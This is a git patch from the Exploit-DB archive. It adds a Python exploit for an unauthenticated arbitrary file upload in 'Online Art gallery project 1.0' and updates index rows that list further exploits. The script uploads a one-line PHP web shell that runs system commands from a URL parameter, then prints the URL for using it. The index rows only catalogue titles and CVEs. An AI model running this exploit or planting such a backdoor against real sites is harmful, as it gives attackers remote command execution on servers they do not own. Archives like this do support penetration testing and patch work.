From 1e4f82620abfd39ccbe7962dc1f2ff1b286469a4 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Fri, 16 Jun 2023 00:16:25 +0000
Subject: [PATCH] DB: 2023-06-16

2 changes to exploits/shellcodes/ghdb

Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
---
 exploits/php/webapps/51524.py | 44 +++++++++++++++++++++++++++++++++++
 files_exploits.csv            |  5 ++--
 2 files changed, 47 insertions(+), 2 deletions(-)
 create mode 100755 exploits/php/webapps/51524.py

diff --git a/exploits/php/webapps/51524.py b/exploits/php/webapps/51524.py
new file mode 100755
index 000000000..1bf74b3c8
--- /dev/null
+++ b/exploits/php/webapps/51524.py
@@ -0,0 +1,44 @@
+# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
+# Google Dork: n/a
+# Date: 14/06/2023
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
+# CVE : n/a
+
+# Vulnerability Description:
+#
+# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
+# Usage: python exploit.py http://example.com
+
+import requests
+import sys
+
+def upload_file(url, filename, file_content):
+    files = {
+        'sliderpic': (filename, file_content, 'application/octet-stream')
+    }
+
+    data = {
+        'img_id': '',
+        'sliderPicSubmit': ''
+    }
+    url = url+"/Admin/adminHome.php"
+    try:
+        response = requests.post(url, files=files, data=data)
+    except:
+        print("[!] Exploit failed!")
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print("Usage: python exploit.py <target_url>")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    file_name = "simple-backdoor.php"
+    file_content = '<?php system($_GET["c"]);?>'
+
+    upload_file(target_url, file_name, file_content)
+    print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 992faea35..d2ec1fa42 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -24609,6 +24609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
 51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
+51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-06-15,0,,,,,,
 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
@@ -34525,7 +34526,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
-51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
+51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-15,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
@@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
 45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
 45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
-51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
+51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-06-15,1,CVE-2023-30145,,,,,
 51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
 41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html